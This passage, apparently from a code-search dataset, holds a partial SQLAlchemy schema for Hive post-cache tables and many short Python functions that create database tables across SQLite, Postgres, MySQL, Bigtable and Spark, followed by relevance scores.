BOOLEAN, nullable=False, server_default='0'),\n\n # ui flags/filters\n sa.Column('is_nsfw', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_declined', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_full_power', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_hidden', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_grayed', BOOLEAN, nullable=False, server_default='0'),\n\n # important indexes\n sa.Column('rshares', sa.BigInteger, nullable=False, server_default='0'),\n sa.Column('sc_trend', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('sc_hot', sa.Float(precision=6), nullable=False, server_default='0'),\n\n # bulk data\n sa.Column('body', TEXT),\n sa.Column('votes', TEXT),\n sa.Column('json', sa.Text),\n sa.Column('raw_json', sa.Text),\n\n # index: misc\n sa.Index('hive_posts_cache_ix3', 'payout_at', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # core: payout sweep\n sa.Index('hive_posts_cache_ix8', 'category', 'payout', 'depth', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: tag stats\n\n # index: ranked posts\n sa.Index('hive_posts_cache_ix2', 'promoted', postgresql_where=sql_text(\"is_paidout = '0' AND promoted > 0\")), # API: promoted\n\n sa.Index('hive_posts_cache_ix6a', 'sc_trend', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending todo: depth=0\n sa.Index('hive_posts_cache_ix7a', 'sc_hot', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot todo: depth=0\n sa.Index('hive_posts_cache_ix6b', 'post_id', 'sc_trend', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending, filtered todo: depth=0\n sa.Index('hive_posts_cache_ix7b', 'post_id', 'sc_hot', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot, filtered todo: depth=0\n\n sa.Index('hive_posts_cache_ix9a', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout todo: rem depth\n sa.Index('hive_posts_cache_ix9b', 'category', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout, filtered todo: rem depth\n\n sa.Index('hive_posts_cache_ix10', 'post_id', 'payout', postgresql_where=sql_text(\"is_grayed = '1' AND payout > 0\")), # API: muted, by filter/date/payout\n\n # index: stats\n sa.Index('hive_posts_cache_ix20', 'community_id', 'author', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: pending distribution; author payout\n\n # index: community ranked posts\n sa.Index('hive_posts_cache_ix30', 'community_id', 'sc_trend', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community trend\n sa.Index('hive_posts_cache_ix31', 'community_id', 'sc_hot', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community hot\n sa.Index('hive_posts_cache_ix32', 'community_id', 'created_at', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community created\n sa.Index('hive_posts_cache_ix33', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND is_paidout = '0'\")), # API: community payout\n sa.Index('hive_posts_cache_ix34', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '1' AND is_paidout = '0'\")), # API: community muted\n )\n\n sa.Table(\n 'hive_state', metadata,\n 
sa.Column('block_num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('db_version', sa.Integer, nullable=False),\n sa.Column('steem_per_mvest', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('usd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('sbd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('dgpo', sa.Text, nullable=False),\n )\n\n metadata = build_metadata_community(metadata)\n\n metadata = build_metadata_blacklist(metadata)\n\n metadata = build_trxid_block_num(metadata)\n\n return metadata", "def create_and_insert_dfs(connection: DBConnection) -> None:\n print(\"\\n[-] creating table dfs\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE dfs AS\n SELECT term, COUNT(tf) AS df FROM tfs GROUP BY term\n \"\"\")\n print(\"\\r[+] creating table dfs\")", "def new_table(self):\n self.c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS {table} (\n id integer primary key,\n {event} integer,\n {desc} text,\n {date} text,\n {link} text)\n \"\"\".format(\n table=TABLE,\n event=EVENT,\n desc=DESC,\n date=DATE,\n link=LINK,\n )\n )", "def create_db(self):", "def create_tables(self):\n if not self.is_enabled(Subsystem.database):\n raise RuntimeError(\"Database subsystem was not enabled\")\n\n Base.metadata.create_all(self.engine)", "def create_tables(cur, conn):\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n print(f\"\\nRunning: {query}\")", "def check_and_create_table(self) -> None:\n table_ids = [t.table_id for t in self.instance.list_tables()]\n\n if not self.table_id in table_ids:\n self.table.create()\n f = self.table.column_family(self.family_id)\n f.create()\n\n f_inc = self.table.column_family(self.incrementer_family_id,\n gc_rule=MaxVersionsGCRule(1))\n f_inc.create()\n\n f_log = self.table.column_family(self.log_family_id)\n f_log.create()\n\n f_ce = self.table.column_family(self.cross_edge_family_id,\n gc_rule=MaxVersionsGCRule(1))\n f_ce.create()\n\n print(\"Table created\")", "def create_table():\n conn = psycopg2.connect(host=\"localhost\", database=\"integration\", user=\"postgres\", password=\"postgres\")\n cursor = conn.cursor()\n cursor.execute(CREATE_TABLE)\n conn.commit()\n cursor.close()", "def create_container(cls, values):\n dbdriver = get_instance()\n return dbdriver.create_container(values)", "def setup_tables(self):\n try:\n self.cursor.execute('CREATE SCHEMA sandbox')\n self.cursor.execute(\"DROP TABLE sandbox.dvds_rdbhdb_super;\")\n except (db.ProgrammingError, db.OperationalError), e:\n # sandbox may not exist\n pass #raise\n\n try:\n self.cursor.execute(\n \"\"\"CREATE TABLE sandbox.dvds_rdbhdb_super(\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n rating float,\n UNIQUE(name)\n );\n \"\"\" )\n except db.ProgrammingError, e:\n if e[0] != '42P07':\n raise", "def __init__(self, database='/tmp/blingalytics_cache'):\n self.database = database\n self._create_metadata_table()", "def create_UAG_table_in_sql(sql_cursor):\n sql_cursor.execute('''DROP TABLE IF EXISTS uag_complete;''')\n sql_cursor.execute(\n '''CREATE TABLE uag_complete (\n _id integer PRIMARY KEY, \n user_id varchar(50),\n age_bucket varchar(20),\n age_avg varchar(20),\n gender_bucket varchar(20),\n source varchar(30));\n ''')", "def create_tables(cursor):\n cursor.execute(\"\"\"\n CREATE TABLE users(\n userid INTEGER PRIMARY KEY,\n username TEXT NOT NULL,\n password TEXT NOT NULL,\n email TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE groups(\n groupid INTEGER PRIMARY KEY,\n name TEXT NOT NULL\n 
);\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE usergroups(\n userid INTEGER,\n groupid INTEGER,\n PRIMARY KEY (userid, groupid)\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n FOREIGN KEY (groupid) REFERENCES groups (groupid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE settings(\n key TEXT PRIMARY KEY,\n value\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE sessions(\n userid INTEGER PRIMARY KEY,\n key TEXT NOT NULL,\n started TEXT DEFAULT (datetime('now')),\n FOREIGN KEY (userid) REFERENCES users (userid)\n ON DELETE CASCADE ON UPDATE NO ACTION\n );\n \"\"\")\n cursor.execute(\"CREATE UNIQUE INDEX idx_groups_name ON groups (name)\")\n cursor.execute(\n \"CREATE UNIQUE INDEX idx_users_username ON users (username)\"\n )", "def create_tables() -> None:\n print(\"Creating database tables using SQLAlchemy ORM\")\n Base.metadata.create_all(engine)\n print(\"Done creating tables\")", "def create_table(self):\n self.db.query(f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.table} (\n id INT UNSIGNED NOT NULL AUTO_INCREMENT,\n name VARCHAR(140) NOT NULL,\n PRIMARY KEY (id)\n )\n \"\"\")", "def create_table(self, table_info, table_name):\r\n t1 = time.time()\r\n if self.database in ['redshift', 'postgres']:\r\n postgres_helper.create_table(\r\n conf=self.conf,\r\n table_info=table_info,\r\n table_name=table_name\r\n )\r\n else:\r\n raise Exception(\"database not supported yet: '{}'\"\r\n .format(self.database))\r\n t2 = time.time()\r\n t = t2 - t1\r\n print('Finished in {:.2f} seconds.'.format(t))\r\n return", "def _newcontainer(self, siginfo):\n pass", "def create_table(self):\n table = self.table\n table.create()\n return table.bind.wait()", "def _create_intermediate_old_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n amnesty_granted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_old_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_old_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def _newcontainer(self, siginfo):\n self.logger.log('creating a new %s with siginfo %r' % 
(self.cname, (siginfo, )))\n if self.ourcontainer:\n self.logger.log('freeing previously loaded %s' % (self.cname))\n self.announcequeue.append(self.ourcontainer)\n self.ourcontainer.save()\n self.ourcontainer.complete = True\n self.session.add(self.ourcontainer)\n\n self.ourcontainer = self.container(self.config.owner, self.config, siginfo=siginfo)\n self.ourcontainer.create(int(self.config.container_manager.maxcapacity))\n self.ourcontainer.save()\n self.logger.log(\"New %s's filename: %s\" % (self.cname, self.ourcontainer.filename))", "def __create__container(self):\n self.__used_containers.append(contenedor.Arena(self.__blocks_size))", "async def _create_table(self, table: TableSchema) -> None:\n try:\n await self.conn.execute(get_create_table(table))\n except PostgresError: # Only DB related exceptions\n print(f\"Failed to execute CREATE TABLE for {table['name']}\")\n raise\n # Initialize migration level (so that it can be altered in future)\n await self.conn.execute('INSERT INTO tinymud_migrations (table_name, level) VALUES ($1, $2)', table['name'], 0)", "def createTables ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n sqlQuery ( c, \"drop table if exists Crises;\" )\n sqlQuery ( c, \"drop table if exists Organizations;\" )\n sqlQuery ( c, \"drop table if exists People;\" )\n sqlQuery ( c, \"drop table if exists CrisisLocations;\" )\n sqlQuery ( c, \"drop table if exists PeopleLocations;\" )\n sqlQuery ( c, \"drop table if exists OrganizationLocations;\" )\n sqlQuery ( c, \"drop table if exists HumanImpact;\" )\n sqlQuery ( c, \"drop table if exists ResourceNeeded;\" )\n sqlQuery ( c, \"drop table if exists WaysToHelp;\" )\n sqlQuery ( c, \"drop table if exists PersonExternalResources;\" )\n sqlQuery ( c, \"drop table if exists OrganizationExternalResources;\" )\n sqlQuery ( c, \"drop table if exists CrisisExternalResources;\" )\n sqlQuery ( c, \"drop table if exists PeopleToOrganizations;\" )\n sqlQuery ( c, \"drop table if exists OrganizationsToCrises;\" )\n sqlQuery ( c, \"drop table if exists CrisesToPeople;\" )\n sqlQuery ( c, \"drop table if exists OrganizationKind;\" )\n sqlQuery ( c, \"drop table if exists PersonKind;\" )\n sqlQuery ( c, \"drop table if exists CrisisKind;\" )\n \n sqlQuery ( c, \"create table Crises ( crisisID text, name text, crisisKindID text, startDate date, startTime time, endDate date, endTime time, economicImpact text );\" )\n sqlQuery ( c, \"create table Organizations ( orgID text, name text, orgKindID text, history text, phone bigint, fax bigint, email text, address text, locality text, region text, postalCode text, country text );\" )\n sqlQuery ( c, \"create table People ( personID text, firstName text, middleName text, lastName text, suffix text, personKindID text );\" )\n sqlQuery ( c, \"create table CrisisLocations ( crisisID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table PeopleLocations ( personID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table OrganizationLocations ( orgID text, locality text, region text, country text );\" )\n sqlQuery ( c, \"create table HumanImpact ( crisisID text, type text, number int );\" )\n sqlQuery ( c, \"create table ResourceNeeded ( crisisID text, resource text );\" )\n sqlQuery ( c, \"create table WaysToHelp ( crisisID text, helpType text );\" )\n sqlQuery ( c, \"create table PersonExternalResources ( personID text, type text, url text );\" )\n sqlQuery ( c, \"create table OrganizationExternalResources ( orgID text, type 
text, url text );\" )\n sqlQuery ( c, \"create table CrisisExternalResources ( crisisID text, type text, url text );\" )\n sqlQuery ( c, \"create table PeopleToOrganizations ( personID text, orgID text );\" )\n sqlQuery ( c, \"create table OrganizationsToCrises ( orgID text, crisisID text );\" )\n sqlQuery ( c, \"create table CrisesToPeople ( crisisID text, personID text );\" )\n sqlQuery ( c, \"create table OrganizationKind ( orgKindID text, name text, description text );\" )\n sqlQuery ( c, \"create table PersonKind ( personKindID text, name text, description text );\" )\n sqlQuery ( c, \"create table CrisisKind ( crisisKindID text, name text, description text );\" )\n sqlQuery ( c, \"show tables;\" )", "def create_tables( self ) :\n return self._create_tables", "def test_create_tables(self):\n conn_object = ParentConnection()\n conn_object.create_tables()\n conn = psycopg2.connect(**{\"host\": \"localhost\",\n \"database\": \"test\",\n \"user\": \"test\",\n \"password\": \"test\"})\n cur = conn.cursor()\n cur.execute(\"SELECT * from information_schema.tables \"\n \"WHERE table_schema = 'public' \"\n \"AND table_type = 'BASE TABLE';\")\n result = cur.fetchall()\n result = [x[2] for x in result]\n self.assertCountEqual(result,\n ['bioms', 'counts', 'networks',\n 'taxonomy', 'edges', 'samples', 'meta']\n )\n cur.close()\n conn.close()\n conn_object.delete_tables()", "def __create_db_container(self):\n self.__check_db_container(mode='running')\n self.__check_db_container(mode='exist')\n\n if self.__is_db_running:\n LOGGER.info('db container ({}) is already up and'\n ' running. Skipping creation step...'.format(self.__db_cont_name))\n self.__remove_create_db()\n pass\n elif self.__is_db_exist and not self.__is_db_running:\n LOGGER.info('db container({}) already exists. 
'\n 'Restarting db container'.format(self.__db_cont_name))\n subprocess.run(['docker', 'restart', self.__db_cont_name])\n time.sleep(10)\n self.__remove_create_db()\n\n else:\n # create the db container\n LOGGER.debug('Creating db container with name {}'.format(self.__db_cont_name))\n arg_port = ['-p', '{}:5432'.format(self.__dbport)]\n arg_name = ['--name', self.__db_cont_name]\n arg_env1 = ['-e', 'POSTGRES_PASSWORD={}'.format(self.__dbpassword)]\n arg_env2 = ['-e', 'POSTGRES_USER={}'.format(self.__dbuser)]\n arg_img = ['-d', self.__db_image]\n command2 = ['docker', 'run'] + arg_port + arg_name + arg_env1 + arg_env2 + arg_img\n try:\n createproc = subprocess.run(command2)\n time.sleep(50)\n self.__remove_create_db()\n except subprocess.CalledProcessError:\n LOGGER.warning('There was an error while attempting creating the db container.')\n raise DockerExecError('There was an error while attempting creating the db container.')", "def create_database_structure(self):\n Base.metadata.create_all(self.engine)", "def create_table(self, create_table_sql):\n print('connect')\n conn = psycopg2.connect(self.name, sslmode='require')\n c = conn.cursor()\n c.execute(create_table_sql)\n conn.close()", "def create_database_stock_master():\n sql = \"\"\"\n CREATE DATABASE stock_master;\n \"\"\"\n excute_sql(sql,None)", "def create_table(self, conn, create_table_sql):\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(e)", "def create_table(self, param, timeout):\n _abstract()", "def create_table(self, param, timeout):\n _abstract()", "def create_table():\n\tCURSOR.execute(\"\"\"CREATE TABLE IF NOT EXISTS {} (\n\t\t\t[ID] NVARCHAR NOT NULL PRIMARY KEY,\n\t\t\t[Name] NVARCHAR,\n\t\t\t[Definition] NVARCHAR)\"\"\".format(TABLE_NAME))", "def create_db_tables():\n\n try:\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()\n except Exception as e:\n # TODO: melhorar o informe do erro\n raise e", "def create_table(table_name:str, database_name:str='dars_nic_391419_j3w9t_collab', select_sql_script:str=None) -> None:\n \n spark.conf.set(\"spark.sql.legacy.allowCreatingManagedTableUsingNonemptyLocation\",\"true\")\n \n if select_sql_script is None:\n select_sql_script = f\"SELECT * FROM global_temp.{table_name}\"\n \n spark.sql(f\"\"\"CREATE TABLE {database_name}.{table_name} AS\n {select_sql_script}\n \"\"\")\n spark.sql(f\"ALTER TABLE {database_name}.{table_name} OWNER TO {database_name}\")", "def __create_wallets_table(self):\n cmd = \"\"\" CREATE TABLE IF NOT EXISTS %s (\n %s text PRIMARY KEY,\n %s blob,\n %s blob);\"\"\" %(TABLE_WALLETS,\n COL_WALLETS_NAME,\n COL_WALLETS_PUB_KEY,\n COL_WALLETS_PVT_KEY)\n self.__dbcursor.execute(cmd)", "def create_tables(cur, conn):\n \n for query in create_table_queries:\n cur.execute(query)\n conn.commit()" ]
[ "0.74409187", "0.7198487", "0.61117744", "0.59451663", "0.5910709", "0.58744675", "0.5785568", "0.57599217", "0.5757854", "0.5751283", "0.5730389", "0.5673858", "0.56548923", "0.5640886", "0.5640633", "0.56349385", "0.56337035", "0.56274104", "0.5623988", "0.5606793", "0.5597963", "0.5573337", "0.5571024", "0.5565667", "0.55620784", "0.55570585", "0.554801", "0.55396", "0.5525229", "0.5510787", "0.5509207", "0.5508847", "0.5507494", "0.5489148", "0.5485659", "0.54823554", "0.5482306", "0.5477766", "0.54684484", "0.54681075", "0.54681075", "0.5437509", "0.5433392", "0.54305565", "0.543021", "0.54279387", "0.54244", "0.54238176", "0.5423558", "0.5414247", "0.54113185", "0.53966284", "0.5393476", "0.5392047", "0.5386038", "0.5385472", "0.5385065", "0.5385004", "0.53847414", "0.5381752", "0.53814304", "0.5376172", "0.5375416", "0.53749263", "0.5374443", "0.53725517", "0.53703845", "0.53611517", "0.5348418", "0.534791", "0.53345376", "0.5328805", "0.5322687", "0.5322114", "0.53110033", "0.53103614", "0.53096825", "0.5309403", "0.52988863", "0.5298542", "0.528803", "0.5284496", "0.52802503", "0.52790004", "0.5275625", "0.52712023", "0.52691746", "0.5268949", "0.52680516", "0.52644205", "0.5261157", "0.52597547", "0.52586573", "0.5254426", "0.5254426", "0.52510285", "0.52429456", "0.5239401", "0.5236639", "0.52351886" ]
0.75585115
0
Start running uvicore server.
def run(app_location: str, host: str, port: int):
    # https://github.com/tiangolo/fastapi/issues/1508
    uvicorn.run(
        app_location,
        host=host,
        port=port,
        log_config=None)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def local_main():\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)", "async def start(self):\n server = await asyncio.start_server(\n self.handle_request, self.host, self.port)\n\n addr = server.sockets[0].getsockname()\n print(f'Serving on {addr}')\n\n async with server:\n await server.serve_forever()", "def start():\n\n start_server()", "def main(\n host: str = typer.Option(\"127.0.0.1\", help=\"IP to run the API on\"),\n port: int = typer.Option(8000, help=\"Port to run the API on\"),\n):\n typer.echo(\"🦄 Starting with uvicorn...\")\n typer.echo(\n \"💡 Check out the API docs at \"\n + typer.style(f\"http://{host}:{port}/docs\", bold=True)\n )\n typer.echo(\"-\" * 80)\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)", "def run_app():\n uvicorn.run(\n app,\n host='0.0.0.0',\n port=8000,\n log_config=log_configs.get_uvicorn_logger(configs.LOG_PATH)\n )", "def start(self):\n self.serve_forever()", "def start(self):\n self.serve_forever()", "async def run(self):\n logging.debug(\"Starting server...\")\n # First, check to make sure the same server instance isn't being\n # run multiple times.\n if self._running:\n raise RuntimeError(f\"server {self!r} is already running\")\n\n # Flag the server as running\n self._running = True\n\n # We create a list of coroutines, since we might be running more\n # than just one if we have a TCP Server AND a WebSocketServer.\n coroutines = []\n\n if self.tcp_port is not None:\n # start asyncio.Server\n self.tcp_server = await asyncio.start_server(self._register_tcp,\n port=self.tcp_port)\n # add it to the list of coroutines\n coroutines.append(self.tcp_server.serve_forever())\n\n if self.ws_port is not None:\n # start a WebSocketServer\n self.ws_server = await websockets.serve(self._register_ws,\n port=self.ws_port)\n # use a simple coro so that MudServer doesn't close\n # with WebSocketServer still running\n coroutines.append(self.ws_server.wait_closed())\n\n # We use asyncio.gather() to execute multiple coroutines.\n await asyncio.gather(*coroutines, return_exceptions=True)", "def start(self):\n run(self.app, host=self.host, port=self.port, server=AsyncServer,\n quiet=True, debug=False)", "def serve() -> None:\n uvicorn.run(\n \"bartender.web.application:get_app\",\n workers=settings.workers_count,\n host=settings.host,\n port=settings.port,\n reload=settings.reload,\n log_level=settings.log_level,\n factory=True,\n )", "def run():\n server = current_server()\n server._auto_stop = True\n return start()", "def run(self):\n self._server = self._get_server()\n self._server.serve_forever()", "def start(cls):\n\n logger.info(\"reading config\")\n env = cs.HostingEnvironment()\n env.start_metrics_if_enabled()\n\n if env.user_script_name:\n Server._download_user_module(env)\n\n logger.info('loading framework-specific dependencies')\n framework = cs.ContainerEnvironment.load_framework()\n framework.load_dependencies()\n\n nginx_pid = 0\n gunicorn_bind_address = '0.0.0.0:8080'\n if env.use_nginx:\n logger.info(\"starting nginx\")\n nginx_conf = pkg_resources.resource_filename('container_support', 'etc/nginx.conf')\n subprocess.check_call(['ln', '-sf', '/dev/stdout', '/var/log/nginx/access.log'])\n subprocess.check_call(['ln', '-sf', '/dev/stderr', '/var/log/nginx/error.log'])\n gunicorn_bind_address = 'unix:/tmp/gunicorn.sock'\n nginx_pid = subprocess.Popen(['nginx', '-c', nginx_conf]).pid\n\n logger.info(\"starting gunicorn\")\n gunicorn_pid = subprocess.Popen([\"gunicorn\",\n \"--timeout\", str(env.model_server_timeout),\n \"-k\", \"gevent\",\n \"-b\", 
gunicorn_bind_address,\n \"--worker-connections\", str(1000 * env.model_server_workers),\n \"-w\", str(env.model_server_workers),\n \"container_support.wsgi:app\"]).pid\n\n signal.signal(signal.SIGTERM, lambda a, b: Server._sigterm_handler(nginx_pid, gunicorn_pid))\n\n children = set([nginx_pid, gunicorn_pid]) if nginx_pid else gunicorn_pid\n logger.info(\"inference server started. waiting on processes: %s\" % children)\n\n while True:\n pid, _ = os.wait()\n if pid in children:\n break\n\n Server._sigterm_handler(nginx_pid, gunicorn_pid)", "def run_server(log_level):\n # Uvicorn expects lowercase logging levels; the logging package expects upper.\n os.environ[\"LOG_LEVEL\"] = log_level.upper()\n import atexit\n from subprocess import Popen\n\n installP = Popen([\"yarn\", \"install\", \"--quiet\"],\n cwd=\"src/service_bus/static/service_bus\")\n installP.communicate()\n\n buildP = Popen([\"yarn\", \"watch\", \"--quiet\"],\n cwd=\"src/service_bus/static/service_bus\")\n atexit.register(buildP.terminate)\n uvicorn.run(\"service_bus.main:app\", host=\"127.0.0.1\", debug=True,\n reload=True, log_level=log_level)", "def run(app: FastAPI, web_service_config: WebServiceConfig = WebServiceConfig()):\n uvicorn.run(app=app, host=web_service_config.host, port=web_service_config.http_port, )", "def run_server(**options):\n loop = asyncio.get_event_loop()\n loop.set_exception_handler(async_exception_handler)\n loop.create_task(run_server_async(**options))\n loop.run_forever()", "def main():\n server = ThreadedServer(MasterControllerService, port=5000)\n server.start()", "def start():\n server = current_server()\n logger.info('Starting Flexx event loop.')\n server.start()", "async def start(self):\n await self._backend.start()", "def run(self):\n self.__server.serve_forever()", "def run_server(self, _):\n if not ENABLE_SERVER:\n logger.info('server not enabled, exit')\n return\n app.run(host=API_HOST, port=API_PORT, threaded=API_THREADED)", "def start(params) -> None:\n check_root()\n start_microservice(params)\n load_kernel_module(params)\n start_streamer(params)", "def web(host: str, port: str, loglevel: str) -> None:\n uvicorn.run(\"source.apps.web:App\", host=host, port=port, log_level=loglevel)", "def start():\n if env.latest:\n if env.python3:\n sudo('/bin/systemctl start demo-latest-py3', shell=False)\n else:\n sudo('/bin/systemctl start demo-latest.service', shell=False)\n else:\n with cd(env.directory):\n sudo('./bin/supervisorctl start zeoserver', user=env.deploy_user)\n sudo(\"sleep 2\")\n sudo('./bin/supervisorctl start zeoclient1', user=env.deploy_user)\n sudo(\"sleep 2\")\n sudo('./bin/supervisorctl start zeoclient2', user=env.deploy_user)", "def start(self):\n threading.Thread(target=self.serve_forever).start()", "def start_server(self):\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n\n # The two services we added in the proto. You can find these functions in\n # jellybeanrobot_pb2_grpc.py.\n jellybeanrobot_pb2_grpc.add_JellyServicer_to_server(Robot(), server)\n\n # Start listening on a port.\n server.add_insecure_port(\"localhost:%d\" % self.port)\n print \"Listening on localhost:%d!\\n\" % self.port\n server.start()\n\n try:\n while True:\n time.sleep(3600) # one hour. 
\n except KeyboardInterrupt:\n server.stop(0)", "def start(self):\n #url = '{}://{}:{}/'.format('http',\n # self.ip,\n # self.port)\n #self.service_info = ServiceInfo(\n # '_webthing._sub._http._tcp.local.',\n # '{}._http._tcp.local.'.format(self.name),\n # address=socket.inet_aton(self.ip),\n # port=self.port,\n # properties={\n # 'url': url,\n # },\n # server='{}.local.'.format(socket.gethostname()))\n #self.zeroconf = Zeroconf()\n #self.zeroconf.register_service(self.service_info)\n\n # If WebSocketS used and NOT running in thread, and WebServer IS\n # running in thread make shure WebServer has enough stack size to\n # handle also the WebSocket requests.\n log.info('Starting Web Server')\n self.server.Start(threaded=srv_run_in_thread, stackSize=8192)", "def webserver_start():\n run(_webserver_command())", "def main():\n return run_server(**parse_server_args())", "def start(self):\n gevent.spawn(self.run)", "def start_server(self):\n app.run(host=str(self.__constants.host),\n port=int(self.__constants.port),\n debug=bool(self.__constants.runindebug))", "async def start(self) -> None:", "def run():\n import argparse\n\n parser = argparse.ArgumentParser(description='Phovea Server')\n parser.add_argument('--use_reloader', action='store_true', help='whether to automatically reload the server')\n parser.add_argument('--env', default=cc.get('env'), help='environment mode (dev or prod)')\n\n # parse before to enable correct plugin discovery\n args = parser.parse_known_args()[0]\n if args.env.startswith('dev'):\n enable_dev_mode()\n else:\n enable_prod_mode()\n\n # resolve the default command to decide which application to launch\n default_command = _resolve_commands(parser)\n if default_command is not None:\n # set a default subparse to extract the defined arguments from the instance to the main arguments (?)\n set_default_subparser(parser, default_command)\n\n args = parser.parse_args()\n\n _set_runtime_infos(args)\n\n main = args.launcher(args) # execute the launcher function, which returns another function\n\n if args.use_reloader:\n _log.info('start application using reloader...')\n run_with_reloader(main, extra_files=_config_files())\n else:\n _log.info('start application...')\n main()", "def run():\n register_component(\"press\")\n run_app(host=\"0.0.0.0\", port=8080, debug=True, workers=os.cpu_count())", "def start(self) -> None:\n app = web.Application()\n app.add_routes([web.post(\"/\", self._handle_request)])\n self._runner = web.AppRunner(app)\n\n self._startup_event = threading.Event()\n self._server_loop = asyncio.new_event_loop()\n t = threading.Thread(target=self._run)\n t.start()\n\n # Wait for server to startup\n self._startup_event.wait()", "def startServer(self):\n processor = ThinService.Processor(self.serverLogic)\n serverSocket = TSocket.TServerSocket(Constants.SERVER_HOST, Constants.SERVER_PORT)\n transportFactory = TTransport.TBufferedTransportFactory()\n protocolFactory = TBinaryProtocol.TBinaryProtocolFactory()\n\n server = TServer.TSimpleServer(processor, serverSocket, transportFactory, protocolFactory)\n server.serve()", "def run():\n\n # Construct a server.\n server = wsgiref.simple_server.make_server(\n _config[ 'address' ],\n _config[ 'port' ],\n application\n )\n\n # Run the server.\n server.serve_forever()\n\n # Return result.\n return 0", "def Run(self):\n self.BuildWebAppSite()\n\n self.BuildRPCSite(self.env.umpire_cli_port, self.methods_for_cli, '0.0.0.0')\n self.BuildRPCSite(self.env.umpire_rpc_port, self.methods_for_dut)\n\n # Start services.\n 
